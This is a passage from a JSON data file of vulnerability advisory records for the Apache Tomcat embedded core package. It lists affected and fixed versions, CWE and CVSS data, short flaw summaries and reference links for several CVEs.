"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-hh3j-x4mc-g48r/GHSA-hh3j-x4mc-g48r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.49" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 8.5.48", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-hh3j-x4mc-g48r/GHSA-hh3j-x4mc-g48r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.29" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-hh3j-x4mc-g48r/GHSA-hh3j-x4mc-g48r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12418" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4251-1" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K10107360?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200107-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00029.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00024.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/43530b91506e2e0c11cfbe691173f5df8c48f51b98262426d7493b67%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html" } ], "database_specific": { "cwe_ids": [ "CWE-522" ], "github_reviewed": true, "github_reviewed_at": "2019-12-26T18:22:10Z", "nvd_published_at": "2019-12-23T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j39c-c8hj-x4j3", "published": "2021-06-16T17:45:29Z", "modified": "2024-02-19T05:31:44.331997Z", "aliases": [ "BIT-tomcat-2021-25122", "CVE-2021-25122" ], "related": [ "CGA-vhqv-jhjv-679r" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat", "details": "When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-j39c-c8hj-x4j3/GHSA-j39c-c8hj-x4j3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.43" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-j39c-c8hj-x4j3/GHSA-j39c-c8hj-x4j3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.63" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-j39c-c8hj-x4j3/GHSA-j39c-c8hj-x4j3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25122" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd90bf36b1877e1310b87ecd14ed7bbb15da52b297efd9f0e7253a3b@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0463f9a5cbc02a485404c4b990f0da452e5ac5c237808edba11c947@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-34" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210409-0002" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4891" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/01/1" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2021-03-24T19:53:13Z", "nvd_published_at": "2021-03-01T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jgwr-3qm3-26f3", "published": "2021-03-19T20:11:13Z", "modified": "2024-03-08T05:18:06.945365Z", "aliases": [ "BIT-tomcat-2021-25329", "CVE-2021-25329" ], "related": [ "CGA-457j-5q26-g4hx" ], "summary": "Potential remote code execution in Apache Tomcat", "details": "The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.2" } ] } ], "versions": [ "10.0.0", "10.0.0-M1", "10.0.0-M10", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.41" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.61" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.108" } ] } ], "versions": [ "7.0.0", "7.0.100", "7.0.103", "7.0.104", "7.0.105", "7.0.106", "7.0.107", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c 7.0.107", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-jgwr-3qm3-26f3/GHSA-jgwr-3qm3-26f3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25329" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6d66e99ef85da93e4d2c2a536ca51aa3418bfaf4" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4891" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210409-0002" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202208-34" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/01/2" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-19T20:10:56Z", "nvd_published_at": "2021-03-01T12:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jjpq-gp5q-8q6w", "published": "2019-05-30T03:30:42Z", "modified": "2024-03-11T14:57:09.068862Z", "aliases": [ "CVE-2019-0221" ], "summary": "Cross-site scripting in Apache Tomcat", "details": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.17" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-jjpq-gp5q-8q6w/GHSA-jjpq-gp5q-8q6w.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.40" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-jjpq-gp5q-8q6w/GHSA-jjpq-gp5q-8q6w.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.94" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-jjpq-gp5q-8q6w/GHSA-jjpq-gp5q-8q6w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0221" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/15fcd166ea2c1bb79e8541b8e1a43da9c452ceea" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/44ec74c44dcd05cd7e90967c04d40b51440ecd7e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4fcdf706f3ecf35912a600242f89637f5acb32da" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190606-0001" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K13184144?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K13184144?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-7.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-1" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-2" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227055048/http://www.securityfocus.com/bid/108545" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3929" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3931" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00044.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00090.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00054.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/163457/Apache-Tomcat-9.0.0.M1-Cross-Site-Scripting.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/50" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-05-30T03:30:07Z", "nvd_published_at": "2019-05-28T22:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jx6h-3fjx-cgv5", "published": "2018-10-17T16:31:48Z", "modified": "2024-11-29T05:50:11.687725Z", "aliases": [ "CVE-2018-1305" ], "summary": "Apache Tomcat information exposure vulnerability", "details": "Security constraints defined by annotations of Servlets in Apache Tomcat 